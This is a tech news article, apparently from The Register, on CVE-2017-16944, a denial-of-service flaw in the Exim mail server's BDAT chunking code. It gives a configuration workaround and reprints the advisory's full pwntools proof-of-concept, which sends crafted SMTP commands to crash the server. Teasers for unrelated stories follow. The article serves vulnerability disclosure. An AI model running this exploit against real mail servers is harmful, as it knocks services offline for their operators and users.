Exim-ergency! Unix mailer has RCE, DoS vulnerabilities

Patch imminent, for now please turn off email attachment chunking


Sysadmins who tend Exim servers have been advised to kick off their working weeks with the joy of patching.

The popular (if relatively low-profile) Internet mail message transfer agent (MTA) advised of flaws in a Black Friday post to its public bugtracker, which as contributor Phil Pennock said in this message came without any prior notice.

The bug tracker post explained that when parsing the BDAT data header, Exim scans for the '.' character to signify the end of an email. BDAT is a server verb associated with the MTA's ability to handle large attachments in chunks (see RFC 1830, for example).

The advisory included a proof-of-concept (less than 30 lines, below). The poster explained that because a function pointer, receive_getc is not reset, the PoC makes Exim run out of stack and crash.

The announcement for CVE-2017-16944 identified the slip as existing in the “receive_msg function in receive.c in the SMTP daemon in Exim 4.88 and 4.89”.

Confirming the bug, Pennock said the developers have a “tentative patch” but it needs to be confirmed.

The workaround in the meantime, he said, is to disable chunking by setting the following flag:

chunking_advertise_hosts=

The empty value after the equal sign turns off the vulnerable function.

According to a November 2017 study by E-Soft, Exim is by far the most popular MTA on the Internet, in use on nearly 57 per cent of MX servers it identified. ®

The proof-of-concept

# pip install pwntools
from pwn import *

r = remote('localhost', 25)

r.recvline()
r.sendline("EHLO test")
r.recvuntil("250 HELP")
r.sendline("MAIL FROM:<test@localhost>")
r.recvline()
r.sendline("RCPT TO:<test@localhost>")
r.recvline()
#raw_input()
r.sendline('a'*0x1100+'\x7f')
#raw_input()
r.recvuntil('command')
r.sendline('BDAT 1')
r.sendline(':BDAT \x7f')
s = 'a'*6 + p64(0xdeadbeef)*(0x1e00/8)
r.send(s+ ':\r\n')
r.recvuntil('command')
#raw_input()
r.send('\n')
r.interactive()
exit()

Similar topics


Other stories you might like

  • It's one thing to have the world in your hands – what are you going to do with it?

    Google won the patent battle against ART+COM, but we were left with little more than a toy

    Column I used to think technology could change the world. Google's vision is different: it just wants you to sort of play with the world. That's fun, but it's not as powerful as it could be.

    Despite the fact that it often gives me a stomach-churning sense of motion sickness, I've been spending quite a bit of time lately fully immersed in Google Earth VR. Pop down inside a major city centre – Sydney, San Francisco or London – and the intense data-gathering work performed by Google's global fleet of scanning vehicles shows up in eye-popping detail.

    Buildings are rendered photorealistically, using the mathematics of photogrammetry to extrude three-dimensional solids from multiple two-dimensional images. Trees resolve across successive passes from childlike lollipops into complex textured forms. Yet what should feel absolutely real seems exactly the opposite – leaving me cold, as though I've stumbled onto a global-scale miniature train set, built by someone with too much time on their hands. What good is it, really?

    Continue reading
  • Why Cloud First should not have to mean Cloud Everywhere

    HPE urges 'consciously hybrid' strategy for UK public sector

    Sponsored In 2013, the UK government heralded Cloud First, a ground-breaking strategy to drive cloud adoption across the public sector. Eight years on, and much of UK public sector IT still runs on-premises - and all too often - on obsolete technologies.

    Today the government‘s message boils down to “cloud first, if you can” - perhaps in recognition that modernising complex legacy systems is hard. But in the private sector today, enterprises are typically mixing and matching cloud and on-premises infrastructure, according to the best business fit for their needs.

    The UK government should also adopt a “consciously hybrid” approach, according to HPE, The global technology company is calling for the entire IT industry to step up so that the public sector can modernise where needed and keep up with innovation: “We’re calling for a collective IT industry response to the problem,” says Russell MacDonald, HPE strategic advisor to the public sector.

    Continue reading
  • A Raspberry Pi HAT for the Lego Technic fan

    Sneaking in programming under the guise of plastic bricks

    There is good news for the intersection of Lego and Raspberry Pi fans today, as a new HAT (the delightfully named Hardware Attached on Top) will be unveiled for the diminutive computer to control Technic motors and sensors.

    Using a Pi to process sensor readings and manage motors has been a thing since the inception of the computer, and users (including ourselves) have long made use of the General Purpose Input / Output (GPIO) pins that have been a feature of the hardware for all manner of projects.

    However, not all users are entirely happy with breadboards and jumpers. Lego, familiar to many a builder thanks to lines such as its Mindstorms range, recently introduced the Education SPIKE Prime set, aimed at the classroom.

    Continue reading

Biting the hand that feeds IT © 1998–2021